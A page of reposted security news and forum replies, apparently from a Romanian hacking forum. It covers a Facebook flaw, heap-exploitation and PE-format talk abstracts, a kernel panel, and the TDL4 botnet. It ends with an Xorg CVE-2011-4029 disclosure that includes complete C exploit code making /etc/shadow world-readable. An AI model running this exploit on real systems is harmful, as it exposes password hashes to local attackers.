EXE files in messages,cause possible User Credentials to be Compromised . Not even Account Security, Also there are lots of Privacy Issues in Facebook,like Nelson Novaes Neto, a Brazilian (independent) Security and Behavior Research have analyze a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent . Facebook should takes these privacy issues & security holes very seriously. Demo: http://www.hackersonlineclub.com/hack-facebook-account Sursa: Facebook "Trusted friends" Security Feature Easily Exploitable ~ THN : The Hacker News
  15. Understanding the Low Fragmentation Hea Blackhat USA 2010 Chris Valasek X-Force Researcher cvalasek . gmail.com @nudehaberdasher Table of Contents Introduction................................................................................................................................................ 4 Overview................................................................................................................................................. 4 Prior Works ............................................................................................................................................. 5 Prerequisites ........................................................................................................................................... 6 Terminology............................................................................................................................................ 6 Notes ...................................................................................................................................................... 7 Data Structures ........................................................................................................................................... 7 _HEAP ..................................................................................................................................................... 7 _HEAP_LIST_LOOKUP.............................................................................................................................. 9 _LFH_HEAP ........................................................................................................................................... 10 _LFH_BLOCK_ZONE............................................................................................................................... 11 _HEAP_LOCAL_DATA ............................................................................................................................ 11 _HEAP_LOCAL_SEGMENT_INFO ........................................................................................................... 12 _HEAP_SUBSEGMENT........................................................................................................................... 12 _HEAP_USERDATA_HEADER ................................................................................................................. 13 _INTERLOCK_SEQ.................................................................................................................................. 14 _HEAP_ENTRY....................................................................................................................................... 15 Overview............................................................................................................................................... 16 Architecture.............................................................................................................................................. 17 FreeLists ................................................................................................................................................ 17 Algorithms ................................................................................................................................................ 20 Allocation.............................................................................................................................................. 20 Back-end Allocation .............................................................................................................................. 21 RtlpAllocateHeap .............................................................................................................................. 21 Overview........................................................................................................................................... 27 Front-end Allocation ............................................................................................................................. 28 RtlpLowFragHeapAllocFromContext ................................................................................................. 28 Overview........................................................................................................................................... 363 Example ............................................................................................................................................ 37 Freeing .................................................................................................................................................. 40 Back-end Freeing .............................................................................................................................. 41 RtlpFreeHeap .................................................................................................................................... 41 Overview........................................................................................................................................... 47 Front-end Freeing ................................................................................................................................. 48 RtlpLowFragHeapFree....................................................................................................................... 48 Overview........................................................................................................................................... 51 Example ............................................................................................................................................ 52 Security Mechanisms ................................................................................................................................ 55 Heap Randomization............................................................................................................................. 55 Comments......................................................................................................................................... 56 Header Encoding/Decoding .................................................................................................................. 56 Comments......................................................................................................................................... 57 Death of bitmap flipping ....................................................................................................................... 58 Safe Linking........................................................................................................................................... 59 Comments......................................................................................................................................... 59 Tactics ....................................................................................................................................................... 60 Heap Determinism................................................................................................................................ 60 Activating the LFH ............................................................................................................................. 60 Defragmentation............................................................................................................................... 61 Adjacent Data ................................................................................................................................... 62 Seeding Data ..................................................................................................................................... 63 Exploitation........................................................................................................................................... 67 Ben Hawkes #1.................................................................................................................................. 67 FreeEntryOffset Overwrite................................................................................................................ 71 Observations......................................................................................................................................... 79 SubSegment Overwrite ..................................................................................................................... 79 Example ............................................................................................................................................ 83 Issues ................................................................................................................................................ 83 Conclusion ................................................................................................................................................ 85 Bibliography.............................................................................................................................................. 86 Introduction Over the years, Windows heap exploitation has continued to increase in difficulty due to the addition of exploitation counter measures along with the implementation of more complex algorithms and data structures. Due to these trends and the scarcity of comprehensive heap knowledge within the community, reliable exploitation has severely declined. Maintaining a complete understanding of the inner workings of a heap manager can be the difference between unpredictable failure and precise exploitation. The Low Fragmentation heap has become the default front-end heap manager for the Windows operating system since the introduction of Windows Vista. This new front-end manager brought with it a different set of data structures and algorithms that replaced the Lookaside List. The system has also changed the way back-end memory management works as well. All of this material must be reviewed to understand the repercussions of allocating and freeing memory within an application on Windows 7. The main goal of this paper is to familiarize the reader with the newly created logic and data structures associated with the Low Fragmentation heap. First, a clear and concise foundation will be provided by explaining the new data structures and their coupled purpose within the heap manager. Then detailed explanations concerning the underlying algorithms that manipulate those data structures will be discussed. Finally, some newly devised exploitation techniques will be unveiled providing practical applications from this new found knowledge. Download: http://illmatics.com/Understanding_the_LFH.pdf
  16. Undocumented PECOFF CONSTANT INSECURITY: THINGS YOU DIDN'T KNOW ABOUT (PE) PORTABLE EXECUTABLE FILE FORMAT One constant challenge of modern security will always be the difference between published and implemented specifications. Evolving projects, by their very nature, open up a host of exploit areas and implementation ambiguities that cannot be fixed. As such, complex documentation such as that for PECOFF or PDF are goldmines of possibilities. In this talk we will disclose our recent findings about never before seen PE or Portable executable format malformations. These findings have serious consequences on security and reverse engineering tools and lead to multiple exploit vectors. PE is the main executable image file format on Windows operating system since its introduction in Windows NT 18 years ago. PE file format itself can be found on numerous Windows-based devices including PCs, mobile and gaming devices, BIOS environments and others. Its proper understanding is the key for securing these platforms. The talk will focus on all aspects of PE file format parsing that leads to undesired behavior or prevents security and reverse engineering tools from inspecting malformated files due to incorrect parsing. Special attention will be given to differences between PECOFF documentation and the actual implementation done by the operating system loader. With respect to these differences we will demonstrate existence of files that can't possibly be considered valid from a documentation standpoint but which are still correctly processed and loaded by the operating system. These differences and numerous design logic flaws can lead to PE processing errors that have serious and hardly detectable security implications. Effects of these PE file format malformations will be compared against several reverse engineering tools, security applications and unpacking systems. Special attention will be given to following PE file format aspects and their malformation consequences: General PE header layout in respect to data positioning and consequences of different memory model implementations as specified by PECOFF documentation. Use of multiple PE headers in a single file along with self-destructing headers. Alignment fields with their impact on disk and memory layout with the section layout issues that can occur due to disk or memory data overlapping or splicing. In addition to this, section table content will be inspected for issues of data hiding and its limits will be tested for upper and lower content boundaries. We will demonstrate how such issues affect existing static and dynamic PE unpacking systems. Data tables, including imports and exports, will be discussed in detail to show how their malformated content can break analysis tools but is still considered valid from the operating system loader standpoint. We will demonstrate existence of files that can miss use existing PE features in order to cloak important file information and omit reverse engineering process. Furthermore based upon these methods a unique undetectable method of API hooking that requires no code for hooks insertion will be presented. PE file format will be inspected for integer overflows and we will show how their presence can lead to arbitrary code execution in otherwise safe analysis environments. We will show how PE fields themselves could be used to deliver code payload resulting in a completely new field of programming; via the file format itself. In addition to single field and table malformations more complex ones involving multiple fields and tables will also be discussed. As a demonstration of such use case scenario a unique malformation requiring multiple fields working together to establish custom file encryption will be presented. This simple, yet effective, encryption that is reversed during runtime by the operating system loader itself requires no code in the malformated binary itself to be executed. Its effectiveness is in a unique approach to encryption trough file format features themselves in order to prevent static and dynamic file analysis tools from processing such files. This talk will be a Black Hat exclusive; Whitepaper accompanying the presentation materials will contain detailed description of all malformations discussed during the talk. This whitepaper aims to be a mandatory reading material for security analysts. It will continue to be maintained as new information on PE format malformations are discovered. Slides: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Slides.pdf Download whitepaper: http://www.reversinglabs.com/blackhat/PECOFF_BlackHat-USA-11-Whitepaper.pdf Sursa: ReversingLabs vulnerability advisory | www.reversinglabs.com | Reverse Engineering & Software Protection
  17. Nytro

    Nelamurire

    E bine ca ai postat aici. In primul rand, nu vad ce motive ar avea cineva sa ajunga VIP. In momentul de fata, VIPii sunt membri mai vechi ai forumului, oameni pe care ii cunoastem si stim de ce sunt in stare, persoane care au contribuit foarte mult. Daca sunt VIPi fara foarte multe poturi, sunt niste oameni care si-au demonstrat calitatile prin diverse actiuni, ne-au demonstrat ca sunt "speciali" si acesta e un mod simplu de a-i recompensa. Practic prin VIP strangem membri de care suntem multumiti. Bine, trebuie facuta putina ordine pe acolo, vreau sa mai dau vreo 2-3 VIP-uri, dar nu prea am avut timp sa urmaresc forumul. Avantaje nu ar fi extrem de multe, nu avem loguri sau astfel de prostii in categoria speciala, dar membri VIP au un cuvant de spus in legatura cu schimbarile de aici. In rest, dat fiind faptul ca ne cunoastem, ne putem ajuta intre noi si fara sa postam la categoria speciala, cand unul are nevoie de ceva, se gaseste sigur cineva care sa il ajute si tot asa. Pentru a deveni VIP trebuie sa postezi practic. Nu conteaza ce, depinde de tine. In functie de ce postezi ne dam seama de cunosntintele dar si de modul de a gandi, si astfel se primeste acest statut. Si daca tot veni vorba, dai si tu o sticla de whisky si altfel discutam.
  18. Hackers wanted Hackers are people too Documentar de la Discovery despre Hacking Lasa rahaturile ca Hackers 95 in care 2 ratati apasa in disperare pe tastatura si trec de firewalluri si mai stiu eu ce penibilitati...
  19. Nici eu nu sunt de acord cu furtul informational (da, sigur, parole de Filelist, al dracu de interesant) dar e aiurea ce a postat acolo. Eh, e si aceea o reclama, o sa ne trezim cu fani ai furturilor de conturi.
  20. Iti iei o carte de gramatica si o carte de literatura in limba engleza pe care o citesti cu dictionarul langa tine. Apoi treci la partea de "listening" si vorbire, trebuie sa ai o persoana care stie engleza, care stie sa pronunte cum trebuie... Poti sa te uiti si la filme in engleza fara subtitrare.
  21. The Kernel Panel at LinuxCon Europe Wednesday, 26 October 2011 14:31 Nathan Willis Linux users got a rare opportunity to hear directly from the hackers at the core of the Linux kernel on Wednesday at LinuxCon Europe. Read on for more on the state of ARM in the Linux kernel, the need for new kernel contributors, and the death of the Big Kernel Lock (BKL). Linus Torvalds and other kernel developers sat down for a question and answer session at the first LinuxCon Europe. Lennart Poettering, creator of PulseAudio and systemd, served as moderator for the panel, which consisted of Torvalds, Alan Cox, Thomas Gleixner, and Paul McKenney. The four took prepared questions from Poettering, as well as responding to impromptu audience member questions on every topic from version numbers to the future of the kernel project itself. The panelists introduced themselves first. Torvalds, of course, is the leader of the project. Cox works primarily in system-on-chip these days (although he has had other roles in the past). Gleixner maintains the real-time patches. McKenney works on the read-copy-update (RCU) mechanism. Together they account for just a tiny fraction of the kernel community, but by their roles and experience offer keen insights into the health of the kernel, the health of the kernel community, and the directions it is heading. Poettering opened by asking the group about a frequently-quoted comment by Torvalds that breaking userspace compatibility was something that had to be avoided at all costs. A nice sentiment, Poettering said, but one that sounds hypocritical considering how often the kernel team really does break compatibility with its releases — sometimes even with trivial changes like the switch from 2.6.x version numbers to 3.0 that happened earlier this year. Torvalds pointed out that any program which assumed that the kernel's version number would always start with a "2" was broken already, but that the kernel team had also added a "compatibility" mode that would report its version number as 2.6.40 if buggy programs needed it. That encapsulated the kernel team's approach: add something new, but do everything possible to make sure that the old way of doing things continued to work. Torvalds added that he used to keep ancient binaries around — including the very first shells written for Linux, which used APIs that were deprecated within months — to test against each new kernel release, just to make sure that old code continued to run. API stability is important, he said, but it flows out of not breaking the user experience. "No project is more important than the users of that project," he summarized. Next, Poettering asked if there was an aging problem with the core kernel development team, noting that the average age of the subsystem maintainers was growing. Torvalds said no, but that it sometimes seemed like it simply because it takes time for a new contributor to "graduate" from maintaining a single driver to managing a set, and eventually to managing an entire subsystem. The others agreed; Cox added that there was plenty of "fresh blood" in the project, in fact more than enough, but there was a bigger problem in the gender gap — a problem that no one seemed able to fix, despite years of trying. Most of the female kernel contributors today work for commercial vendors, he said; with very few participating because of their own hobbyist interest. Torvalds added that another reason it often seems like the kernel crowd is aging rapidly is how ridiculously young they were when they started — he was only 20 himself, and several other key contributors were still teenagers. Audience members asked questions from microphones placed at the edge of the stage, and several had questions about specific features: the Big Kernel Lock (BKL), the complexity of the ARM tree, and whether or not embedded Linux developers were given as much attention as developers working on desktop and server platforms. Cox reminisced about the BKL, which he called the right solution for the early days of multi-processor support in Linux, even though it had subsequently taken years to replace with more sophisticated methods. It was always a nuisance, he said, but it got Linux SMP support much faster than other OSes, such as the BSDs. The ARM architecture was controversial in recent months, after Torvalds had to resort to tough talk to get the ARM family to clean up its code and standardize more. The situation is much better today, Torvalds reported. The problem, he said, is that while ARM has a standardized instruction set for the processor, every ARM board has a different approach to other important things like timers and interrupts. Intel had never faced such a glut of incompatible standards for the x86 architecture because the PC platform was so uniform, so it has taken a while for ARM to see the need to take a more active approach towards standardization. Torvalds also said that for the most part the kernel team is very interested in embedded development; what gets tricky is that most embedded Linux devices are designed to be built once and never upgraded. That makes it harder to do testing and ongoing kernel support for embedded platforms. When asked about the challenges facing the Linux kernel over the next few years, McKenney cited a number of research topics facing all operating systems: scalability, real-time, and validation, to name a few. Torvalds said maintaining the right balance between complexity and the ability to get things done. The sheer amount of new hardware that comes out every year is overwhelming, he said; keeping up with it is a practical (though not theoretical) challenge for the team. Speaking of the practical, one audience member asked Torvalds what his process was when getting a new pull request from a contributor. "I manage by trusting people," he replied. Whenever a pull request comes in, he looks at the person who sent it. Depending on the person, his process varies: some people have earned enough trust over the years that he believes in their judgment, while others have their own recurring issues that mandate additional review. In any case, he said, he makes sure that the new code compiles on his own machine because he "hates it" when he can't compile for his own configuration. But for the most part, he said, his role is no longer to validate individual pieces of code, but to orchestrate the work of others. If he knows two people are working in a similar part of the kernel, he needs to be aware of it to avert clashes, but he trusts the maintainers of their individual subsections. That trust is given to the person, he reiterated; the individual earns it, not the company that the individual might work for. The panel touched on other areas as well, including security, cgroups, and subsystem bloat. In each case, was comes across in a panel discussion such as this is how human the process of writing and maintaining the kernel is. The kernel team can make mistakes, and they have to route around them with bugfixes in subsequent releases. Maintainers may not be interested in a particular area of development, but they will look at and even integrate the patches because they are important to a subset of developers or kernel users. The kernel may have steep technical challenges, but just as real a threat to productivity is burnout among maintainers. It is fun to watch the kernel team wisecrack and comment on stage, but it is also a healthy reminder that above all else, Linux is a collaborative project, not simply lines of code. Sursa: http://www.linux.com/learn/tutorials/499287:the-kernel-panel-at-linuxcon-europe
  22. Facebook Tests Security Features By Antone Gonsalves, CRN October 27, 2011 7:42 PM ET Facebook is testing security features that boost password protection for third-party applications and make it easier to reactivate accounts hijacked by hackers. Facebook unveiled App Passwords and Trusted Friends Wednesday, saying they would be testing the features over the “coming weeks.” The announcement is the latest effort by Facebook to improve safety on the site, which is a favorite target of cyber-criminals looking to dupe the social network’s 800 million users worldwide. Trusted Friends is like giving a bosom buddy the key to your house in case you get locked out. A user selects three to five friends that Facebook will send a secret code to pass along, if the account holder can’t get into the site. This sometimes happens when a hacker hijacks someone’s Facebook account and changes the password. App Passwords provides a higher level of security for logging in to third-party applications. A growing number of Web applications allow people to log in using their Facebook credentials. As an alternative, a unique password can be generated by going to Account Settings, then the Security tab and finally to the App Passwords section. Entering an e-mail address and the Facebook-generated password should get a person into the app. The password doesn’t have to be remembered, because Facebook can generate it anytime. Facebook announced the features the same day a security researcher reported a flaw that makes it possible to send a message on Facebook with an executable file attached. Such malware is often sent by cyber-criminals attempting to secretly gain control of people’s PCs. Nathan Power, director of a professional group called the Ohio Information Security Forum, discovered the workaround for Facebook’s security mechanism that prevents sending executables. Power reported the vulnerability to Facebook September 30, and said the vendor acknowledged the flaw Wednesday. Sursa: http://www.crn.com/news/security/231901834/facebook-tests-security-features.htm
  23. TDL4 botnet may be available for rent 27 October 2011 ESET's senior research fellow David Harley says that, while his team of researchers have been tracking the TDL4 botnet for some time, they have noticed a new phase in its evolution. These changes, he noted, may signal that either the team developing the malware has changed or that the developers have started selling a bootkit builder to other cybercriminal groups on a rental basis. The dropper for the botnet, he asserted, sends copious tracing information to the command-and-control server during the installation of the rootkit onto the system. In the event of any error, he said, it sends a comprehensive error message that gives the malware developers enough information to determine the cause of the fault. All of this, wrote Harley in his latest security posting, suggests that this bot is still under development. “We also found a form of countermeasure against bot trackers based on virtual machines: during the installation of the malware it checks on whether the dropper is being run in a virtual machine environment and this information is sent to the command-and-control server. Of course, malware that checks on whether it is running in a virtual environment is far from unusual in modern malware, but in this form it's kind of novel for TDL”, he said. On of the most interesting evolutions of the botnet, Infosecurity notes, is that the layout of the hidden file system has been changed also. In contrast to the previous version, which Harley said is capable of storing at most 15 files – regardless of the size of reserved space – the capacity of the new file system is limited by the length of the malicious partition. The file system presented by the latest modification of the malware is more advanced than previously, noted Harley, adding that, as an example, the malware is able to detect corruption of the files stored in the hidden file system by calculating its CRC32 checksum and comparing it with the value stored in the file header. In the event that a file is corrupted it is removed from the file system. Over at Avecto, Mark Austin, the Windows privilege management specialist, said that the removal of admin rights can add an extra layer of defence in the ongoing battle against the malware coders. “TDL-4 is a damaging piece of code that takes the competitor-removing aspects of darkware we saw with SpyEye – and its ability to detect and delete Zeus – and adds all manner of evasive technologies that make conventional pattern/heuristic analyses a lot more difficult”, he explained. The removal of admin rights, he went on to say, is a powerful option as part of a multi-layered IT security strategy in the constant battle against darkware in all its shapes and forms. “Even if you are unfortunate to find one or more user accounts have been compromised by a phishing attack, for example, the fact that the account(s) are limited in what they can do helps to reduce the effects of the security problem”, he added. Malware like this, said Austin, is almost certain to evolve, with cybercriminals repurposing elements of what is essentially a modular suite of malware, adding enhancements to certain features, deleting older code, and adding new elements to take advantage of newly-discovered attack vectors. “It isn't rocket science that will defeat new evolutions of existing malware – or for that matter completely new darkware code. What is needed is a carefully planned strategy, with well thought out implementations that use multiple elements of security which, when combined, are greater than the sum of their components”, he said. “Privileged account management can greatly assist IT professionals in this regard, as it adds an extra string to their defensive bow. This is all part of the GRC – governance, risk management and compliance – balancing act that is modern IT security management”, he added. Sursa: http://www.infosecurity-magazine.com/view/21651/tdl4-botnet-may-be-available-for-rent/
  24. Google Denies Requests To Remove Videos of Police Brutality By Jon Mitchell / October 27, 2011 4:45 PM In a show of good faith today, Google touted the fact that it has refused to cooperate with local law enforcement agencies in the U.S. who requested the removal of YouTube videos of police brutality and criticisms of law enforcement officials. Google cited its transparency report from the first half of this year, but to mention it today is telling. With violent crackdowns at Occupy Oakland this week, citizen media like YouTube have been a vital channel. From Google's mid-year transparency report: "We received a request from a local law enforcement agency to remove YouTube videos of police brutality, which we did not remove. Separately, we received requests from a different local law enforcement agency for removal of videos allegedly defaming law enforcement officials. We did not comply with those requests, which we have categorized in this Report as defamation requests." http://www.youtube.com/watch?feature=player_embedded&v=uRfjX7vHxM4 "The whole world is watching," as protesters around the country have reminded officials since they first began to occupy Wall Street. With this week's escalations, now would not be a good time for Google to engage in censorship. The wording of its notice about denying the removal requests is encouraging, but it's carefully chosen to suit a particular situation. Google complies with 93% of U.S. removal requests. It has decided that the best course of action is to maintain transparency and respond on a case-by-case basis. That transparency has upset governments, and the refusal to censor police brutality videos surely made some city officials unhappy. But Google's record is spotty. Just this month, it handed over a WikiLeaks volunteer's Gmail data to the U.S. government, which used an old and controversial law to request it without a warrant from a judge. Google is pushing for updated laws that better reflect the media of today, but in the meantime, its record on upholding free speech is touch-and-go. Google has done the right thing with these police takedown requests, but the world should keep watching. What do you think Google's responsibilities are regarding government requests? Sursa: Google Denies Requests To Remove Videos of Police Brutality [uPDATED]
  25. Xorg permission change vulnerability From: vladz <vladz () devzero fr> Introduction ------------ I've found a file permission change vulnerability in the way that Xorg creates its temporary lock file "/tmp/.tXn-lock" (where 'n' is the X display). When exploited, this vulnerability allows a non-root user to set the read permission for all users on any file or directory. For the exploit to succeed the local attacker needs to be able to run the X.Org X11 X server. NOTE: At this time (26/10/2010), some distros are still vulnerable (see "Fix & Patch" above for more informations). Hi list, A couple of weeks ago, I found a permission change vulnerability in the way that Xorg handled its lock files. Once exploited, it allowed a local user to modify the file permissions of an arbitrary file to 444 (read for all). It has been assigned CVE-2011-4029, X.org released a patch on 2011/10/18, and now, I though I could share the vulnerability description and its original PoC. POC: http://vladz.devzero.fr/Xorg-CVE-2011-4029.txt Author: vladz <vladz@devzero.fr> (new on twitter @v14dz!) Description: Xorg permission change vulnerability (CVE-2011-4029) Product: X.Org (http://www.x.org/releases/) Affected: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USE_CHMOD preprocessor identifier PoC tested on: Debian 6.0.2 up to date with X default configuration issued from the xserver-xorg-core package (version 2:1.7.7-13) Follow-up: 2011/10/07 - X.org foundation informed 2011/10/09 - Distros informed 2011/10/18 - Issue/patch publicly announced Introduction ------------ I've found a file permission change vulnerability in the way that Xorg creates its temporary lock file "/tmp/.tXn-lock" (where 'n' is the X display). When exploited, this vulnerability allows a non-root user to set the read permission for all users on any file or directory. For the exploit to succeed the local attacker needs to be able to run the X.Org X11 X server. NOTE: At this time (26/10/2010), some distros are still vulnerable (see "Fix & Patch" above for more informations). Description ----------- Once started, Xorg attempts to create a lock file "/tmp/.Xn-lock" in a secure manner: it creates/opens a temporary lock file "/tmp/.tXn-lock" with the O_EXCL flag, writes the current PID into it, links it to the final "/tmp/.Xn-lock" and unlink "/tmp/.tXn-lock". Here is the code: $ cat -n os/utils.c [...] 288 /* 289 * Create a temporary file containing our PID. Attempt three times 290 * to create the file. 291 */ 292 StillLocking = TRUE; 293 i = 0; 294 do { 295 i++; 296 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); 297 if (lfd < 0) 298 sleep(2); 299 else 300 break; 301 } while (i < 3); 302 if (lfd < 0) { 303 unlink(tmp); 304 i = 0; 305 do { 306 i++; 307 lfd = open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0644); 308 if (lfd < 0) 309 sleep(2); 310 else 311 break; 312 } while (i < 3); 313 } 314 if (lfd < 0) 315 FatalError("Could not create lock file in %s\n", tmp); 316 (void) sprintf(pid_str, "%10ld\n", (long)getpid()); 317 (void) write(lfd, pid_str, 11); 318 (void) chmod(tmp, 0444); 319 (void) close(lfd); 320 [...] 328 haslock = (link(tmp,LockFile) == 0); 329 if (haslock) { 330 /* 331 * We're done. 332 */ 333 break; 334 } 335 else { 336 /* 337 * Read the pid from the existing file 338 */ 339 lfd = open(LockFile, O_RDONLY); 340 if (lfd < 0) { 341 unlink(tmp); 342 FatalError("Can't read lock file %s\n", LockFile); 343 } [...] As a reminder, chmod() operates on filenames rather than on file handles. So in this case, at line 318, there is no guarantee that the file "/tmp/.tXn-lock" still refers to the same file on disk that it did when it was opened via the open() call. See TOCTOU vulnerability explained on OWASP[1] for more informations. The idea here is to remove and replace (by a malicious symbolic link), the "tmp" file ("/tmp/.tXn-lock") between the call to open() at line 296 and the call to chmod() at line 318. But for a non-root user, removing this file looks impossible as it is located in a sticky bit directory ("/tmp") and owned by root. But, what if we launch two Xorg processes with an initial offset (few milliseconds) so that the first process unlink() (line 341) the "tmp" file right before the second process calls chmod()? This race condition would consists in placing unlink() between open() and chmod(). It sounds very difficult because there is only one system call between them (and maybe not enough time to perform unlink() and create our symbolic link): # strace X :1 [...] open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 0644) = 0 write(0, " 2192\n", 11) = 11 chmod("/tmp/.tX1-lock", 0444) = 0 Anyway, we can make this possible by sending signals SIGCONT and SIGSTOP[2] to our process. As they are not trapped by the program, they will allow us to control and regulate (by stopping and resuming) the execution flow. Here is how to proceed: 1) launch the X wrapper (pid=n) 2) stop it (by sending SIGSTOP to 'n') rigth after "/tmp/.tX1-lock" is created (this actually means that the next instruction is chmod()) 3) launch another X process to unlink() /tmp/.tX1-lock 4) create the symbolic link "/tmp/.tX1-lock" -> "/etc/shadow" 5) send SIGCONT to 'n' to perform chmod() on our link The minor problem is that when launching X several times (for race purpose), it makes the console switch between X and TTY, and in some cases, it freezes the screen and disturbs the attack. The solution is to make X exit before it switches by creating a link "/tmp/.Xn-lock" (real lock filename) to a file that doesn't exist. This will make the open() call fails at line 339, and quit with FatalError() at 342. So before our 5 steps, we just need to add: 0) create the symbolic link "/tmp/.X1-lock" -> "/dontexist" Proof Of Concept ---------------- /* xchmod.c -- Xorg file permission change vulnerability PoC This PoC sets the rights 444 (read for all) on any file specified as argument (default file is "/etc/shadow"). Another good use for an attacker would be to dump an entire partition in order to disclose its full content later (via a "mount -o loop"). Made for EDUCATIONAL PURPOSES ONLY! CVE-2011-4029 has been assigned. In some configurations, this exploit must be launched from a TTY (switch by typing Ctrl-Alt-Fn). Tested on Debian 6.0.2 up to date with X default configuration issued from the xserver-xorg-core package (version 2:1.7.7-13). Compile: cc xchmod.c -o xchmod Usage: ./xchmod [/path/to/file] (default file is /etc/shadow) $ ls -l /etc/shadow -rw-r----- 1 root shadow 1072 Aug 7 07:10 /etc/shadow $ ./xchmod [+] Trying to stop a Xorg process right before chmod() [+] Process ID 4134 stopped (SIGSTOP sent) [+] Removing /tmp/.tX1-lock by launching another Xorg process [+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow) [+] Process ID 4134 resumed (SIGCONT sent) [+] Attack succeeded, ls -l /etc/shadow: -r--r--r-- 1 root shadow 1072 Aug 7 07:10 /etc/shadow ----------------------------------------------------------------------- "THE BEER-WARE LICENSE" (Revision 42): <vladz@devzero.fr> wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return. -V. */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdio.h> #include <syscall.h> #include <signal.h> #include <string.h> #include <stdlib.h> #define XORG_BIN "/usr/bin/X" #define DISPLAY ":1" char *get_tty_number(void) { char tty_name[128], *ptr; memset(tty_name, '\0', sizeof(tty_name)); readlink("/proc/self/fd/0", tty_name, sizeof(tty_name)); if ((ptr = strstr(tty_name, "tty"))) return ptr + 3; return NULL; } int launch_xorg_instance(void) { int child_pid; char *opt[] = { XORG_BIN, DISPLAY, NULL }; if ((child_pid = fork()) == 0) { close(1); close(2); execve(XORG_BIN, opt, NULL); _exit(0); } return child_pid; } void show_target_file(char *file) { char cmd[128]; memset(cmd, '\0', sizeof(cmd)); sprintf(cmd, "/bin/ls -l %s", file); system(cmd); } int main(int argc, char **argv) { pid_t proc; struct stat st; int n, ret, current_attempt = 800; char target_file[128], lockfiletmp[20], lockfile[20], *ttyno; if (argc < 2) strcpy(target_file, "/etc/shadow"); else strcpy(target_file, argv[1]); sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1); sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1); /* we must ensure that Xorg is not already running on this display */ if (stat(lockfile, &st) == 0) { printf("[-] %s exists, maybe Xorg is already running on this" " display? Choose another display by editing the DISPLAY" " attributes.\n", lockfile); return 1; } /* this avoid execution to continue (and automatically switch to another * TTY). Xorg quits with fatal error because the file that /tmp/.X?-lock * links does not exist. */ symlink("/dontexist", lockfile); /* we have to force this mask to not comprise our later checks */ umask(077); ttyno = get_tty_number(); printf("[+] Trying to stop a Xorg process right before chmod()\n"); while (--current_attempt) { proc = launch_xorg_instance(); n = 0; while (n++ < 10000) if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0) break; if (ret == 0) { syscall(SYS_kill, proc, SIGSTOP); printf("[+] Process ID %d stopped (SIGSTOP sent)\n", proc); stat(lockfiletmp, &st); if ((st.st_mode & 4) == 0) break; printf("[-] %s file has wrong rights (%o)\n" "[+] removing it by launching another Xorg process\n", lockfiletmp, st.st_mode); launch_xorg_instance(); sleep(7); } kill(proc, SIGKILL); } if (current_attempt == 0) { printf("[-] Attack failed.\n"); if (!ttyno) printf("Try with console ownership: switch to a TTY* by using " "Ctrl-Alt-F[1-6] and try again.\n"); return 1; } printf("[+] Removing %s by launching another Xorg process\n", lockfiletmp); launch_xorg_instance(); sleep(7); if (stat(lockfiletmp, &st) == 0) { printf("[-] %s lock file still here... \n", lockfiletmp); return 1; } printf("[+] Creating evil symlink (%s -> %s)\n", lockfiletmp, target_file); symlink(target_file, lockfiletmp); printf("[+] Process ID %d resumed (SIGCONT sent)\n", proc); kill(proc, SIGCONT); /* wait for chmod() to finish */ usleep(300000); stat(target_file, &st); if (!(st.st_mode & 004)) { printf("[-] Attack failed, rights are %o. Try again!\n", st.st_mode); return 1; } /* cleaning temporary link */ unlink(lockfile); printf("[+] Attack succeeded, ls -l %s:\n", target_file); show_target_file(target_file); return 0; } Fix & Patch ------------ A fix for this vulnerability is available and will be included in xserver 1.11.2 and xserver 1.12. http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4 Some distros released new Xorg packages (Ubuntu, Gentoo) since others (like Debian) judge this as a non-critical issue: http://security-tracker.debian.org/tracker/CVE-2011-4029 Footnotes & links ----------------- [1] https://www.owasp.org/index.php/File_Access_Race_Condition:_TOCTOU [2] http://en.wikipedia.org/wiki/SIGCONT "SIGCONT is the signal sent to restart a process previously paused by the SIGSTOP signal". Sursa: Full Disclosure: Xorg file permission change PoC (CVE-2011-4029) PS: "At this time (26/10/2010)" cred ca vrea sa fie 2011.
×
×
  • Create New...